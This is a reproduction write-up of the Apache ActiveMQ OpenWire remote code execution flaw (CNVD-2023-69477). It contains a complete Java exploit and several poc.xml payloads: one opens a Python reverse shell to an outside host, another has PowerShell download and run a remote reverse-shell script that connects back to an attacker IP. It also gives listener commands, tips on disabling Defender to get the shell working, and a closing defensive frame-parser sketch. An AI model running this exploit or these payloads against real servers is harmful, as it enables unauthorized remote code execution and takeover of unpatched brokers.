Apache ActiveMQ remote code execution (RCE) vulnerability reproduction (CNVD-2023-69477)
This vulnerability was disclosed last week, so it is a good time to reproduce it and write the process down.
1. Vulnerability description
A remote code execution vulnerability exists in Apache ActiveMQ. A remote attacker who can reach the Apache ActiveMQ server's TCP port (default 61616) can execute arbitrary code by sending malicious data to the server.
Affected version
Apache ActiveMQ < 5.18.3
Apache ActiveMQ < 5.17.6
Apache ActiveMQ < 5.16.7
Apache ActiveMQ < 5.15.16
FOFA syntax:
app="APACHE-ActiveMQ" && port="61616"
2. Environment setup
Here I reproduced it locally, using Kali and Win10.
Install ActiveMQ
Visit https://activemq.apache.org/ and download a vulnerable version.
What I downloaded here is the apache-activemq-5.15.10 version.
Unzip it, enter the bin directory and run:
activemq start # start the broker
Visit http://127.0.0.1:8161 and you can see that the environment has started successfully.
3. Vulnerability reproduction
Visit: https://github.com/sincere9/Apache-ActiveMQ-RCE/tree/main/exp
After downloading, enter the /exp folder, open ActiveMQ.java and change the IP addresses to your own (here Win10 is 192.168.2.129 and Kali is 192.168.2.131):
import java.io.*;
import java.net.Socket;

public class ActiveMQ {
    public static void main(final String[] args) throws Exception {
        System.out.println("[*] Poc for ActiveMQ openwire protocol rce");
        String ip = "192.168.2.129";
        int port = 61616;
        String pocxml = "http://192.168.2.131:8000/poc.xml";
        Socket sck = new Socket(ip, port);
        OutputStream os = sck.getOutputStream();
        DataOutputStream out = new DataOutputStream(os);
        out.writeInt(0);          // It doesn't matter
        out.writeByte(31);        // dataType ExceptionResponseMarshaller
        out.writeInt(1);          // CommandId
        out.writeBoolean(true);   // ResponseRequired
        out.writeInt(1);          // CorrelationId
        out.writeBoolean(true);
        out.writeBoolean(true);   // true -> read a UTF-8 string next
        out.writeUTF("org.springframework.context.support.ClassPathXmlApplicationContext");
        out.writeBoolean(true);   // true -> read a UTF-8 string next
        out.writeUTF(pocxml);     // org.apache.activemq.openwire.v1.BaseDataStreamMarshaller#createThrowable instantiates the class, causing the RCE
        out.close();
        os.close();
        sck.close();
        System.out.println("[*] Target\t" + ip + ":" + port);
        System.out.println("[*] XML address\t" + pocxml);
        System.out.println("[*] Payload send success.");
    }
}
Then modify the xml file:
<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
            <list>
                <value>python</value>
                <value>-c</value>
                <value><![CDATA[import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("niubi.com",9999));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty;pty.spawn("/bin/bash")]]></value>
            </list>
        </constructor-arg>
    </bean>
</beans>
Then run the commands:
python3 -m http.server 8000 # start the HTTP server that serves poc.xml
nc -lvvp 9999               # listen for the shell
javac ActiveMQ.java         # compile
java ActiveMQ               # run
However, although poc.xml is indeed fetched here, no reverse shell comes back.
So try a ping to a DNSlog domain instead.
Modify the xml file:
<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
            <list>
                <value>ping</value>
                <value>t1298j.dnslog.cn</value>
            </list>
        </constructor-arg>
    </bean>
</beans>
Here we see that the DNSlog platform does receive the query, proving that the command was executed.
So I tried to find a way to get the reverse shell. I thought that the Windows reverse shell command might be different, so I used PowerShell for the reverse shell.
Modify the poc.xml file:
<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
            <list>
                <value>powershell</value>
                <value>-c</value>
                <value><![CDATA[IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress 192.168.2.131 -Port 23333]]></value>
            </list>
        </constructor-arg>
    </bean>
</beans>
Start the listener and run the exp again.
You can see the reverse shell connect back successfully.
PS: During the reverse shell attempt the shell did not come back at first, so I went into \apache-activemq-5.15.10\data, checked the activemq.log log, and found that the connection had been terminated.
So I turned off the Win10 firewall, Defender, etc., enabled debug logging with log4j.logger.org.apache.activemq=DEBUG, and then checked the logs to work out the problem. Only then did I get the reverse shell successfully.
4. Vulnerability fix
The vendor has fixed this vulnerability by restricting the class deserialized here to subclasses of Throwable. Affected users are advised to update to:
Apache ActiveMQ >= 5.18.3
Apache ActiveMQ >= 5.17.6
Apache ActiveMQ >= 5.16.7
Apache ActiveMQ >= 5.15.16
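As an added, defender-side illustration (not code from the original post or from the PoC repository): a Python decoder for the ExceptionResponse frame layout the Java PoC above writes, which applies the rule the fix introduces (reject a class name that is not a Throwable) plus a heuristic for the URL in the message slot. The Throwable check is approximated by a class-name suffix, since no JVM is available to inspect the real class hierarchy, and the sample frames are constructed in the block with a placeholder host.

```python
import struct
EXCEPTION_RESPONSE = 31  # OpenWire dataType the PoC on this page writes

def _read(buf, fmt, pos):
    size = struct.calcsize(fmt)  # big-endian fields, DataOutputStream order
    if pos + size > len(buf):
        raise ValueError(f"truncated frame at offset {pos}")
    return (*struct.unpack_from(fmt, buf, pos), pos + size)

def _read_utf(buf, pos):
    # DataOutputStream.writeUTF layout: 2-byte big-endian length, then UTF-8 bytes
    n, pos = _read(buf, ">H", pos)
    if pos + n > len(buf):
        raise ValueError("truncated UTF string")
    return buf[pos:pos + n].decode("utf-8"), pos + n

def parse_exception_response(frame):
    """Decode the PoC's field order: size, dataType, commandId, responseRequired,
    correlationId, exception flag, then the optional class name and message."""
    _, data_type, command_id, _, _, has_exc, pos = _read(frame, ">ibi?i?", 0)
    if data_type != EXCEPTION_RESPONSE:
        raise ValueError(f"not an ExceptionResponse (dataType={data_type})")
    class_name = message = None
    if has_exc:
        has_class, pos = _read(frame, ">?", pos)
        class_name, pos = _read_utf(frame, pos) if has_class else (None, pos)
        has_msg, pos = _read(frame, ">?", pos)
        message, pos = _read_utf(frame, pos) if has_msg else (None, pos)
    return {"command_id": command_id, "class_name": class_name, "message": message}

def classify(frame):
    """Apply the fix's rule (only Throwable subclasses) via a name-suffix heuristic, since
    no JVM is available here (assumption), and flag a URL where the PoC puts the XML location."""
    try:
        p = parse_exception_response(frame)
    except ValueError as e:
        return f"malformed: {e}"
    name, msg = p["class_name"] or "", p["message"] or ""
    if name and not name.endswith(("Throwable", "Exception", "Error")):
        return f"reject: non-Throwable class {name}"
    if msg.startswith(("http://", "https://", "file:")):
        return "suspect: URL in exception message"
    return "ok"

# Constructed samples (not captured traffic): the PoC frame re-encoded with the same layout
# (placeholder host 192.0.2.10) and a benign broker ExceptionResponse for comparison.
_utf = lambda s: struct.pack(">H", len(s.encode())) + s.encode()
_HEADER = struct.pack(">ibi?i?", 0, EXCEPTION_RESPONSE, 1, True, 1, True)
POC_FRAME = (_HEADER + b"\x01" + _utf("org.springframework.context.support.ClassPathXmlApplicationContext")
             + b"\x01" + _utf("http://192.0.2.10:8000/poc.xml"))
BENIGN_FRAME = _HEADER + b"\x01" + _utf("java.lang.SecurityException") + b"\x01" + _utf("not authorized")
```

A network sensor or a broker-side filter built on the same idea would drop the PoC frame before any class is instantiated, which is exactly what the fixed versions do in Java.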